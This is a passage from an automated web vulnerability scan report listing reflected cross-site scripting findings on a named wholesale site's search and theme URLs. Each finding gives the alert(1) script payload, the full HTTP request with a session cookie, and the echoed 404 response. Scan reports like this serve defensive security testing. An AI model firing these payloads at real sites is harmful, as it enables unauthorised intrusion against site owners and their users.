Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search6d834<a>6ede6217f4&opt=2 was not found on this server.</p>
...[SNIP]...

2.3843. http://www.resellerbase.com/goods-wholesale/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 90010<a>ed8ede9d9de was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...90010<a>ed8ede9d9de&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...90010<a>ed8ede9d9de&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3844. http://www.resellerbase.com/goods-wholesale/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3447<script>alert(1)</script>b518b8be685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2&f3447<script>alert(1)</script>b518b8be685=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=2&f3447<script>alert(1)</script>b518b8be685=1 was not found on this server.</p>
...[SNIP]...

2.3845. http://www.resellerbase.com/goods-wholesale/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 37b52<a>c85ee83fcd6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=237b52<a>c85ee83fcd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search&opt=237b52<a>c85ee83fcd6 was not found on this server.</p>
...[SNIP]...

2.3846. http://www.resellerbase.com/goods-wholesale/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51ace<script>alert(1)</script>bcac2824f84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale51ace<script>alert(1)</script>bcac2824f84/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale51ace<script>alert(1)</script>bcac2824f84/themes/ was not found on this server.</p>
...[SNIP]...

2.3847. http://www.resellerbase.com/goods-wholesale/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 785e6<script>alert(1)</script>219e22169a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes785e6<script>alert(1)</script>219e22169a3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3848. http://www.resellerbase.com/goods-wholesale/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59e21<script>alert(1)</script>6791d7afa15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/?59e21<script>alert(1)</script>6791d7afa15=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/?59e21<script>alert(1)</script>6791d7afa15=1 was not found on this server.</p>
...[SNIP]...

2.3849. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 97a87<script>alert(1)</script>c1541ebaad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale97a87<script>alert(1)</script>c1541ebaad/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale97a87<script>alert(1)</script>c1541ebaad/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3850. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89a7c<script>alert(1)</script>bf0eb455ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes89a7c<script>alert(1)</script>bf0eb455ca3/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes89a7c<script>alert(1)</script>bf0eb455ca3/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3851. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 240a7<script>alert(1)</script>a0e4733e2c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos240a7<script>alert(1)</script>a0e4733e2c7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos240a7<script>alert(1)</script>a0e4733e2c7/ was not found on this server.</p>
...[SNIP]...

2.3852. http://www.resellerbase.com/goods-wholesale/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1b8a<script>alert(1)</script>6fe01bc043e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/?b1b8a<script>alert(1)</script>6fe01bc043e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/?b1b8a<script>alert(1)</script>6fe01bc043e=1 was not found on this server.</p>
...[SNIP]...

2.3853. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d621<script>alert(1)</script>95cf1483a35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3d621<script>alert(1)</script>95cf1483a35/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3d621<script>alert(1)</script>95cf1483a35/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3854. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>73b48d1d80f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes76cc7<script>alert(1)</script>73b48d1d80f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes76cc7<script>alert(1)</script>73b48d1d80f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3855. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ded4d<script>alert(1)</script>dc41444be5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosded4d<script>alert(1)</script>dc41444be5a/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosded4d<script>alert(1)</script>dc41444be5a/images/ was not found on this server.</p>
...[SNIP]...

2.3856. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ba6e4<script>alert(1)</script>60caf04397d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesba6e4<script>alert(1)</script>60caf04397d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesba6e4<script>alert(1)</script>60caf04397d/ was not found on this server.</p>
...[SNIP]...

2.3857. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82825<script>alert(1)</script>4cbee905304 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/?82825<script>alert(1)</script>4cbee905304=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/?82825<script>alert(1)</script>4cbee905304=1 was not found on this server.</p>
...[SNIP]...

2.3858. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 634fa<script>alert(1)</script>adea212d9a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale634fa<script>alert(1)</script>adea212d9a6/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale634fa<script>alert(1)</script>adea212d9a6/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3859. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dffa8<script>alert(1)</script>2a08be7540c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themesdffa8<script>alert(1)</script>2a08be7540c/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themesdffa8<script>alert(1)</script>2a08be7540c/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3860. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83885<script>alert(1)</script>5ad2ac45be6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos83885<script>alert(1)</script>5ad2ac45be6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos83885<script>alert(1)</script>5ad2ac45be6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3861. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7fc5b<script>alert(1)</script>0ad2549057b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images7fc5b<script>alert(1)</script>0ad2549057b/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images7fc5b<script>alert(1)</script>0ad2549057b/rating/ was not found on this server.</p>
...[SNIP]...

2.3862. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4641<script>alert(1)</script>09b0ba96bca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

